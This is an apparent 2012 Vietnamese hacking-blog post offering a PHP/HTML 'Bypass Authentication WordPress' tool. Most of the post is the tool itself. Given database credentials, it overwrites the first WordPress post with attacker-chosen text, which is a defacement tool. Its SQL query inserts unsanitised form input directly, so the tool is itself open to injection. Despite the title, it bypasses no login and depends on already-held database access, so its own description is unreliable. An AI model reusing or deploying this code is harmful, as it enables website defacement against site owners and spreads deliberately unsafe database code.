Thứ Ba, 7 tháng 8, 2012
Bypass Authentication WordPress
<html> <head> <title>Bypass AuthenticatioN Wordpress By DR.THMOORY</title> <style> textarea { background-color:#ffffff; border:#445588 solid 1px; } textarea.bright { background-color:#ccccff; border:#445588 solid 1px; } textarea.bright1 { background-color:#ccccff; border:#445588 solid 1px; } /** * CSS3 thumbnail inspired by Gloria Langreo */ body { padding: 5em 0; text-align: center; background: url(http://cl.ly/EXdC/darkdenim.png) } a, span { position: relative; display: inline-block; } img { display: block; } span { overflow: hidden; -webkit-box-shadow: 0 2px 8px rgba(0,0,0,1); -moz-box-shadow: 0 2px 8px rgba(0,0,0,1); box-shadow: 0 2px 8px rgba(0,0,0,1); } span:before { content: ""; position: absolute; z-index: 2; top: 0; bottom: 0; right: 0; left: 0; border: 1px solid rgba(255,255,255,.25); } span:after { content: ""; position: absolute; z-index: 1; top: -40%; left: 0; width: 500%; height: 400%; -webkit-border-radius: 100%; -moz-border-radius: 100%; border-radius: 100%; background: transparent; -webkit-box-shadow: 0 0 0 200px rgba(255,255,255,.15); -moz-box-shadow: 0 0 0 200px rgba(255,255,255,.15); box-shadow: 0 0 0 200px rgba(255,255,255,.15); border: 1px solid rgba(255,255,255,.2); transition: all .3s; } span:hover:before { border-color: rgba(255,255,255,.3) } span:hover:after { -webkit-box-shadow: 0 0 0 200px rgba(255,255,255,.2); -moz-box-shadow: 0 0 0 200px rgba(255,255,255,.2); box-shadow: 0 0 0 200px rgba(255,255,255,.2); background: rgba(255,255,255,.05); } *{ font-family:tahoma; font-size:12; } td,tr{ text-align:center;color:#fff;} </style> </head> <body> <center> <font color="#fff">Bypass AuthenticatioN In Wordpress-Wp-admin</font><br /> <a href="javascript:void(0);"><span><img src="http://www.swalif.net/swalifsite/wp-content/uploads/2011/04/best-must-have-wordpress-plugins.jpg"></span></a> <br /><br /><br /><br /> <table> <form method="POST" action=" "> <tr><td>LocalHost:</td><td><input type="text" name="host" value="localhost"/></td><td><br /> <tr><td>Db : </td><td><input type="text" name="db" /></td><td><br /> <tr><td>UserName : </td><td><input type="text" name="username" /></td><td><br /> <tr><td>PassWord-Db :</td><td><input type="password" name="pass" /></td><td><br /> </table> <textarea rows="5" cols="50" name="box">Set Your Index !</textarea><br /> <input type="submit" value="Set Index!" /> <br /> </form> <? $h0st = $_POST['host']; $us0r = $_POST['username']; $p0ss = $_POST['pass']; $dbxx = $_POST['db']; $boox = $_POST['box']; @mysql_connect("$h0st","$us0r","$p0ss"); @mysql_select_db("$dbxx"); $sql = @mysql_query("UPDATE wp_posts SET `post_content` = '".$boox."' WHERE wp_posts.`ID` =1 LIMIT 1 ;"); if ("$sql"){ echo "<font color='#fff'>Done !!</font>"; } ?> </center> </body> </html>
Chuyên Mục:
Hacking and Security,
XSS
Đăng ký:
Đăng Nhận xét (Atom)
Không có nhận xét nào: